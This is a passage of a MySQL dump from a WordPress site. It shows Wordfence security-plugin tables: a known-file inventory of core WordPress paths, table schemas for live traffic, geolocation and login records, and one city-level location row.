r.min.js'),(8034,'wp-includes/js/jquery/ui/dialog.min.js'),(8035,'wp-includes/js/jquery/ui/draggable.min.js'),(8036,'wp-includes/js/jquery/ui/droppable.min.js'),(8037,'wp-includes/js/jquery/ui/effect-blind.min.js'),(8038,'wp-includes/js/jquery/ui/effect-bounce.min.js'),(8039,'wp-includes/js/jquery/ui/effect-clip.min.js'),(8040,'wp-includes/js/jquery/ui/effect-drop.min.js'),(8041,'wp-includes/js/jquery/ui/effect-explode.min.js'),(8042,'wp-includes/js/jquery/ui/effect-fade.min.js'),(8043,'wp-includes/js/jquery/ui/effect-fold.min.js'),(8044,'wp-includes/js/jquery/ui/effect-highlight.min.js'),(8045,'wp-includes/js/jquery/ui/effect-puff.min.js'),(8046,'wp-includes/js/jquery/ui/effect-pulsate.min.js'),(8047,'wp-includes/js/jquery/ui/effect-scale.min.js'),(8048,'wp-includes/js/jquery/ui/effect-shake.min.js'),(8049,'wp-includes/js/jquery/ui/effect-size.min.js'),(8050,'wp-includes/js/jquery/ui/effect-slide.min.js'),(8051,'wp-includes/js/jquery/ui/effect-transfer.min.js'),(8052,'wp-includes/js/jquery/ui/effect.min.js'),(8053,'wp-includes/js/jquery/ui/menu.min.js'),(8054,'wp-includes/js/jquery/ui/mouse.min.js'),(8055,'wp-includes/js/jquery/ui/position.min.js'),(8056,'wp-includes/js/jquery/ui/progressbar.min.js'),(8057,'wp-includes/js/jquery/ui/resizable.min.js'),(8058,'wp-includes/js/jquery/ui/selectable.min.js'),(8059,'wp-includes/js/jquery/ui/selectmenu.min.js'),(8060,'wp-includes/js/jquery/ui/slider.min.js'),(8061,'wp-includes/js/jquery/ui/sortable.min.js'),(8062,'wp-includes/js/jquery/ui/spinner.min.js'),(8063,'wp-includes/js/jquery/ui/tabs.min.js'),(8064,'wp-includes/js/jquery/ui/tooltip.min.js'),(8065,'wp-includes/js/jquery/ui/widget.min.js'),(8066,'wp-includes/js/json2.js'),(8067,'wp-includes/js/json2.min.js'),(8068,'wp-includes/js/masonry.min.js'),(8069,'wp-includes/js/mce-view.js'),(8070,'wp-includes/js/mce-view.min.js'),(8071,'wp-includes/js/media-audiovideo.js'),(8072,'wp-includes/js/media-audiovideo.min.js'),(8073,'wp-includes/js/media-editor.js'),(8074,'wp-includes/js/media-editor.min.js'),(8075,'wp-includes/js/media-grid.js'),(8076,'wp-includes/js/media-grid.min.js'),(8077,'wp-includes/js/media-models.js'),(8078,'wp-includes/js/media-models.min.js'),(8079,'wp-includes/js/media-views.js'),(8080,'wp-includes/js/media-views.min.js'),(8081,'wp-includes/js/mediaelement/mediaelement-and-player.js'),(8082,'wp-includes/js/mediaelement/mediaelement-and-player.min.js'),(8083,'wp-includes/js/mediaelement/mediaelement-migrate.js'),(8084,'wp-includes/js/mediaelement/mediaelement-migrate.min.js'),(8085,'wp-includes/js/mediaelement/mediaelement.js'),(8086,'wp-includes/js/mediaelement/mediaelement.min.js'),(8087,'wp-includes/js/mediaelement/mediaelementplayer-legacy.css'),(8088,'wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css'),(8089,'wp-includes/js/mediaelement/mediaelementplayer.css'),(8090,'wp-includes/js/mediaelement/mediaelementplayer.min.css'),(8091,'wp-includes/js/mediaelement/mejs-controls.png'),(8092,'wp-includes/js/mediaelement/mejs-controls.svg'),(8093,'wp-includes/js/mediaelement/renderers/vimeo.js'),(8094,'wp-includes/js/mediaelement/renderers/vimeo.min.js'),(8095,'wp-includes/js/mediaelement/wp-mediaelement.css'),(8096,'wp-includes/js/mediaelement/wp-mediaelement.js'),(8097,'wp-includes/js/mediaelement/wp-mediaelement.min.css'),(8098,'wp-includes/js/mediaelement/wp-mediaelement.min.js'),(8099,'wp-includes/js/mediaelement/wp-playlist.js'),(8100,'wp-includes/js/mediaelement/wp-playlist.min.js'),(8101,'wp-includes/js/plupload/handlers.js'),(8102,'wp-includes/js/plupload/handlers.min.js'),(8103,'wp-includes/js/plupload/license.txt'),(8104,'wp-includes/js/plupload/moxie.js'),(8105,'wp-includes/js/plupload/moxie.min.js'),(8106,'wp-includes/js/plupload/plupload.js'),(8107,'wp-includes/js/plupload/plupload.min.js'),(8108,'wp-includes/js/plupload/wp-plupload.js'),(8109,'wp-includes/js/plupload/wp-plupload.min.js'),(8110,'wp-includes/js/quicktags.js'),(8111,'wp-includes/js/quicktags.min.js'),(8112,'wp-includes/js/shortcode.js'),(8113,'wp-includes/js/shortcode.min.js'),(8114,'wp-includes/js/swfobject.js'),(8115,'wp-includes/js/swfupload/handlers.js'),(8116,'wp-includes/js/swfupload/handlers.min.js'),(8117,'wp-includes/js/swfupload/license.txt'),(8118,'wp-includes/js/swfupload/swfupload.js'),(8119,'wp-includes/js/thickbox/loadingAnimation.gif'),(8120,'wp-includes/js/thickbox/macFFBgHack.png'),(8121,'wp-includes/js/thickbox/thickbox.css'),(8122,'wp-includes/js/thickbox/thickbox.js'),(8123,'wp-includes/js/tinymce/langs/wp-langs-en.js'),(8124,'wp-includes/js/tinymce/license.txt'),(8125,'wp-includes/js/tinymce/plugins/charmap/plugin.js'),(8126,'wp-includes/js/tinymce/plugins/charmap/plugin.min.js'),(8127,'wp-includes/js/tinymce/plugins/colorpicker/plugin.js'),(8128,'wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js'),(8129,'wp-includes/js/tinymce/plugins/compat3x/css/dialog.css'),(8130,'wp-includes/js/tinymce/plugins/compat3x/plugin.js'),(8131,'wp-includes/js/tinymce/plugins/compat3x/plugin.min.js'),(8132,'wp-includes/js/tinymce/plugins/directionality/plugin.js'),(8133,'wp-includes/js/tinymce/plugins/directionality/plugin.min.js'),(8134,'wp-includes/js/tinymce/plugins/fullscreen/plugin.js'),(8135,'wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js'),(8136,'wp-includes/js/tinymce/plugins/hr/plugin.js'),(8137,'wp-includes/js/tinymce/plugins/hr/plugin.min.js'),(8138,'wp-includes/js/tinymce/plugins/image/plugin.js'),(8139,'wp-includes/js/tinymce/plugins/image/plugin.min.js'),(8140,'wp-includes/js/tinymce/plugins/link/plugin.js'),(8141,'wp-includes/js/tinymce/plugins/link/plugin.min.js'),(8142,'wp-includes/js/tinymce/plugins/lists/plugin.js'),(8143,'wp-includes/js/tinymce/plugins/lists/plugin.min.js'),(8144,'wp-includes/js/tinymce/plugins/media/plugin.js'),(8145,'wp-includes/js/tinymce/plugins/media/plugin.min.js'),(8146,'wp-includes/js/tinymce/plugins/paste/plugin.js'),(8147,'wp-includes/js/tinymce/plugins/paste/plugin.min.js'),(8148,'wp-includes/js/tinymce/plugins/tabfocus/plugin.js'),(8149,'wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js'),(8150,'wp-includes/js/tinymce/plugins/textcolor/plugin.js'),(8151,'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js'),(8152,'wp-includes/js/tinymce/plugins/wordpress/plugin.js'),(8153,'wp-includes/js/tinymce/plugins/wordpress/plugin.min.js'),(8154,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.js'),(8155,'wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js'),(8156,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.js'),(8157,'wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js'),(8158,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.js'),(8159,'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js'),(8160,'wp-includes/js/tinymce/plugins/wpemoji/plugin.js'),(8161,'wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js'),(8162,'wp-includes/js/tinymce/plugins/wpgallery/plugin.js'),(8163,'wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js'),(8164,'wp-includes/js/tinymce/plugins/wplink/plugin.js'),(8165,'wp-includes/js/tinymce/plugins/wplink/plugin.min.js'),(8166,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.js'),(8167,'wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js'),(8168,'wp-includes/js/tinymce/plugins/wpview/plugin.js'),(8169,'wp-includes/js/tinymce/plugins/wpview/plugin.min.js'),(8170,'wp-includes/js/tinymce/skins/lightgray/content.inline.min.css'),(8171,'wp-includes/js/tinymce/skins/lightgray/content.min.css'),(8172,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.eot'),(8173,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.svg'),(8174,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf'),(8175,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff'),(8176,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.eot'),(8177,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.svg'),(8178,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf'),(8179,'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.woff'),(8180,'wp-includes/js/tinymce/skins/lightgray/img/anchor.gif'),(8181,'wp-includes/js/tinymce/skins/lightgray/img/loader.gif'),(8182,'wp-includes/js/tinymce/skins/lightgray/img/object.gif'),(8183,'wp-includes/js/tinymce/skins/lightgray/img/trans.gif'),(8184,'wp-includes/js/tinymce/skins/lightgray/skin.min.css'),(8185,'wp-includes/js/tinymce/skins/wordpress/images/audio.png'),(8186,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png'),(8187,'wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png'),(8188,'wp-includes/js/tinymce/skins/wordpress/images/embedded.png'),(8189,'wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png'),(8190,'wp-includes/js/tinymce/skins/wordpress/images/gallery.png'),(8191,'wp-includes/js/tinymce/skins/wordpress/images/more-2x.png'),(8192,'wp-includes/js/tinymce/skins/wordpress/images/more.png'),(8193,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png'),(8194,'wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png'),(8195,'wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png'),(8196,'wp-includes/js/tinymce/skins/wordpress/images/playlist-video.png'),(8197,'wp-includes/js/tinymce/skins/wordpress/images/video.png'),(8198,'wp-includes/js/tinymce/skins/wordpress/wp-content.css'),(8199,'wp-includes/js/tinymce/themes/inlite/theme.js'),(8200,'wp-includes/js/tinymce/themes/inlite/theme.min.js'),(8201,'wp-includes/js/tinymce/themes/modern/theme.js'),(8202,'wp-includes/js/tinymce/themes/modern/theme.min.js'),(8203,'wp-includes/js/tinymce/tiny_mce_popup.js'),(8204,'wp-includes/js/tinymce/tinymce.min.js'),(8205,'wp-includes/js/tinymce/utils/editable_selects.js'),(8206,'wp-includes/js/tinymce/utils/form_utils.js'),(8207,'wp-includes/js/tinymce/utils/mctabs.js'),(8208,'wp-includes/js/tinymce/utils/validate.js'),(8209,'wp-includes/js/tinymce/wp-tinymce.js'),(8210,'wp-includes/js/tinymce/wp-tinymce.php'),(8211,'wp-includes/js/tw-sack.js'),(8212,'wp-includes/js/tw-sack.min.js'),(8213,'wp-includes/js/twemoji.js'),(8214,'wp-includes/js/twemoji.min.js'),(8215,'wp-includes/js/underscore.js'),(8216,'wp-includes/js/underscore.min.js'),(8217,'wp-includes/js/utils.js'),(8218,'wp-includes/js/utils.min.js'),(8219,'wp-includes/js/wp-a11y.js'),(8220,'wp-includes/js/wp-a11y.min.js'),(8221,'wp-includes/js/wp-ajax-response.js'),(8222,'wp-includes/js/wp-ajax-response.min.js'),(8223,'wp-includes/js/wp-api.js'),(8224,'wp-includes/js/wp-api.min.js'),(8225,'wp-includes/js/wp-auth-check.js'),(8226,'wp-includes/js/wp-auth-check.min.js'),(8227,'wp-includes/js/wp-backbone.js'),(8228,'wp-includes/js/wp-backbone.min.js'),(8229,'wp-includes/js/wp-custom-header.js'),(8230,'wp-includes/js/wp-custom-header.min.js'),(8231,'wp-includes/js/wp-embed-template.js'),(8232,'wp-includes/js/wp-embed-template.min.js'),(8233,'wp-includes/js/wp-embed.js'),(8234,'wp-includes/js/wp-embed.min.js'),(8235,'wp-includes/js/wp-emoji-loader.js'),(8236,'wp-includes/js/wp-emoji-loader.min.js'),(8237,'wp-includes/js/wp-emoji-release.min.js'),(8238,'wp-includes/js/wp-emoji.js'),(8239,'wp-includes/js/wp-emoji.min.js'),(8240,'wp-includes/js/wp-list-revisions.js'),(8241,'wp-includes/js/wp-list-revisions.min.js'),(8242,'wp-includes/js/wp-lists.js'),(8243,'wp-includes/js/wp-lists.min.js'),(8244,'wp-includes/js/wp-pointer.js'),(8245,'wp-includes/js/wp-pointer.min.js'),(8246,'wp-includes/js/wp-sanitize.js'),(8247,'wp-includes/js/wp-sanitize.min.js'),(8248,'wp-includes/js/wp-util.js'),(8249,'wp-includes/js/wp-util.min.js'),(8250,'wp-includes/js/wpdialog.js'),(8251,'wp-includes/js/wpdialog.min.js'),(8252,'wp-includes/js/wplink.js'),(8253,'wp-includes/js/wplink.min.js'),(8254,'wp-includes/js/zxcvbn-async.js'),(8255,'wp-includes/js/zxcvbn-async.min.js'),(8256,'wp-includes/js/zxcvbn.min.js'),(8257,'wp-includes/kses.php'),(8258,'wp-includes/l10n.php'),(8259,'wp-includes/link-template.php'),(8260,'wp-includes/load.php'),(8261,'wp-includes/locale.php'),(8262,'wp-includes/media-template.php'),(8263,'wp-includes/media.php'),(8264,'wp-includes/meta.php'),(8265,'wp-includes/ms-blogs.php'),(8266,'wp-includes/ms-default-constants.php'),(8267,'wp-includes/ms-default-filters.php'),(8268,'wp-includes/ms-deprecated.php'),(8269,'wp-includes/ms-files.php'),(8270,'wp-includes/ms-functions.php'),(8271,'wp-includes/ms-load.php'),(8272,'wp-includes/ms-network.php'),(8273,'wp-includes/ms-settings.php'),(8274,'wp-includes/ms-site.php'),(8275,'wp-includes/nav-menu-template.php'),(8276,'wp-includes/nav-menu.php'),(8277,'wp-includes/option.php'),(8278,'wp-includes/pluggable-deprecated.php'),(8279,'wp-includes/pluggable.php'),(8280,'wp-includes/plugin.php'),(8281,'wp-includes/pomo/entry.php'),(8282,'wp-includes/pomo/mo.php'),(8283,'wp-includes/pomo/plural-forms.php'),(8284,'wp-includes/pomo/po.php'),(8285,'wp-includes/pomo/streams.php'),(8286,'wp-includes/pomo/translations.php'),(8287,'wp-includes/post-formats.php'),(8288,'wp-includes/post-template.php'),(8289,'wp-includes/post-thumbnail-template.php'),(8290,'wp-includes/post.php'),(8291,'wp-includes/query.php'),(8292,'wp-includes/random_compat/byte_safe_strings.php'),(8293,'wp-includes/random_compat/cast_to_int.php'),(8294,'wp-includes/random_compat/error_polyfill.php'),(8295,'wp-includes/random_compat/random.php'),(8296,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(8297,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(8298,'wp-includes/random_compat/random_bytes_libsodium.php'),(8299,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(8300,'wp-includes/random_compat/random_bytes_mcrypt.php'),(8301,'wp-includes/random_compat/random_int.php'),(8302,'wp-includes/registration-functions.php'),(8303,'wp-includes/registration.php'),(8304,'wp-includes/rest-api/class-wp-rest-request.php'),(8305,'wp-includes/rest-api/class-wp-rest-response.php'),(8306,'wp-includes/rest-api/class-wp-rest-server.php'),(8307,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(8308,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(8309,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(8310,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(8311,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(8312,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(8313,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(8314,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(8315,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(8316,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(8317,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(8318,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(8319,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(8320,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(8321,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(8322,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(8323,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(8324,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(8325,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(8326,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(8327,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(8328,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(8329,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(8330,'wp-includes/rest-api.php'),(8331,'wp-includes/revision.php'),(8332,'wp-includes/rewrite.php'),(8333,'wp-includes/rss-functions.php'),(8334,'wp-includes/rss.php'),(8335,'wp-includes/script-loader.php'),(8336,'wp-includes/session.php'),(8337,'wp-includes/shortcodes.php'),(8338,'wp-includes/sodium_compat/LICENSE'),(8339,'wp-includes/sodium_compat/autoload.php'),(8340,'wp-includes/sodium_compat/composer.json'),(8341,'wp-includes/sodium_compat/lib/constants.php'),(8342,'wp-includes/sodium_compat/lib/namespaced.php'),(8343,'wp-includes/sodium_compat/lib/php72compat.php'),(8344,'wp-includes/sodium_compat/lib/sodium_compat.php'),(8345,'wp-includes/sodium_compat/namespaced/Compat.php'),(8346,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(8347,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(8348,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(8349,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(8350,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(8351,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(8352,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(8353,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(8354,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(8355,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(8356,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(8357,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(8358,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(8359,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(8360,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(8361,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(8362,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(8363,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(8364,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(8365,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(8366,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(8367,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(8368,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(8369,'wp-includes/sodium_compat/namespaced/Crypto.php'),(8370,'wp-includes/sodium_compat/namespaced/File.php'),(8371,'wp-includes/sodium_compat/src/Compat.php'),(8372,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(8373,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(8374,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(8375,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(8376,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(8377,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(8378,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(8379,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(8380,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(8381,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(8382,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(8383,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(8384,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(8385,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(8386,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(8387,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(8388,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(8389,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(8390,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(8391,'wp-includes/sodium_compat/src/Core/SipHash.php'),(8392,'wp-includes/sodium_compat/src/Core/Util.php'),(8393,'wp-includes/sodium_compat/src/Core/X25519.php'),(8394,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(8395,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(8396,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(8397,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(8398,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(8399,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(8400,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(8401,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(8402,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(8403,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(8404,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(8405,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(8406,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(8407,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(8408,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(8409,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(8410,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(8411,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(8412,'wp-includes/sodium_compat/src/Core32/Int32.php'),(8413,'wp-includes/sodium_compat/src/Core32/Int64.php'),(8414,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(8415,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(8416,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(8417,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(8418,'wp-includes/sodium_compat/src/Core32/Util.php'),(8419,'wp-includes/sodium_compat/src/Core32/X25519.php'),(8420,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(8421,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(8422,'wp-includes/sodium_compat/src/Crypto.php'),(8423,'wp-includes/sodium_compat/src/Crypto32.php'),(8424,'wp-includes/sodium_compat/src/File.php'),(8425,'wp-includes/sodium_compat/src/SodiumException.php'),(8426,'wp-includes/spl-autoload-compat.php'),(8427,'wp-includes/taxonomy.php'),(8428,'wp-includes/template-loader.php'),(8429,'wp-includes/template.php'),(8430,'wp-includes/theme-compat/comments.php'),(8431,'wp-includes/theme-compat/embed-404.php'),(8432,'wp-includes/theme-compat/embed-content.php'),(8433,'wp-includes/theme-compat/embed.php'),(8434,'wp-includes/theme-compat/footer-embed.php'),(8435,'wp-includes/theme-compat/footer.php'),(8436,'wp-includes/theme-compat/header-embed.php'),(8437,'wp-includes/theme-compat/header.php'),(8438,'wp-includes/theme-compat/sidebar.php'),(8439,'wp-includes/theme.php'),(8440,'wp-includes/update.php'),(8441,'wp-includes/user.php'),(8442,'wp-includes/vars.php'),(8443,'wp-includes/version.php'),(8444,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(8445,'wp-includes/widgets/class-wp-widget-archives.php'),(8446,'wp-includes/widgets/class-wp-widget-calendar.php'),(8447,'wp-includes/widgets/class-wp-widget-categories.php'),(8448,'wp-includes/widgets/class-wp-widget-custom-html.php'),(8449,'wp-includes/widgets/class-wp-widget-links.php'),(8450,'wp-includes/widgets/class-wp-widget-media-audio.php'),(8451,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(8452,'wp-includes/widgets/class-wp-widget-media-image.php'),(8453,'wp-includes/widgets/class-wp-widget-media-video.php'),(8454,'wp-includes/widgets/class-wp-widget-media.php'),(8455,'wp-includes/widgets/class-wp-widget-meta.php'),(8456,'wp-includes/widgets/class-wp-widget-pages.php'),(8457,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(8458,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(8459,'wp-includes/widgets/class-wp-widget-rss.php'),(8460,'wp-includes/widgets/class-wp-widget-search.php'),(8461,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(8462,'wp-includes/widgets/class-wp-widget-text.php'),(8463,'wp-includes/widgets.php'),(8464,'wp-includes/wlwmanifest.xml'),(8465,'wp-includes/wp-db.php'),(8466,'wp-includes/wp-diff.php'),(8467,'wp-links-opml.php'),(8468,'wp-load.php'),(8469,'wp-login.php'),(8470,'wp-mail.php'),(8471,'wp-settings.php'),(8472,'wp-signup.php'),(8473,'wp-trackback.php'),(8474,'xmlrpc.php');
/*!40000 ALTER TABLE `wpxb_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wpxb_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wflivetraffichuman`
--

LOCK TABLES `wpxb_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wpxb_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wflocs`
--

DROP TABLE IF EXISTS `wpxb_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wflocs`
--

LOCK TABLES `wpxb_wflocs` WRITE;
/*!40000 ALTER TABLE `wpxb_wflocs` DISABLE KEYS */;
INSERT INTO `wpxb_wflocs` VALUES ('\0\0\0\0\0\0\0\0\0\0',1566987339,0,'Johannesburg','Gauteng','South Africa','ZA',-26.2308998,28.0583000);
/*!40000 ALTER TABLE `wpxb_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wflogins`
--

DROP TABLE IF EXISTS `wpxb_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=MyISAM AUTO_INCREMENT=1682 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wflogins`
--

LOCK TABLES `wpxb_wflogins` WRITE;
/*!40000 ALTER TABLE `wpxb_wflogins` DISABLE KEYS */;
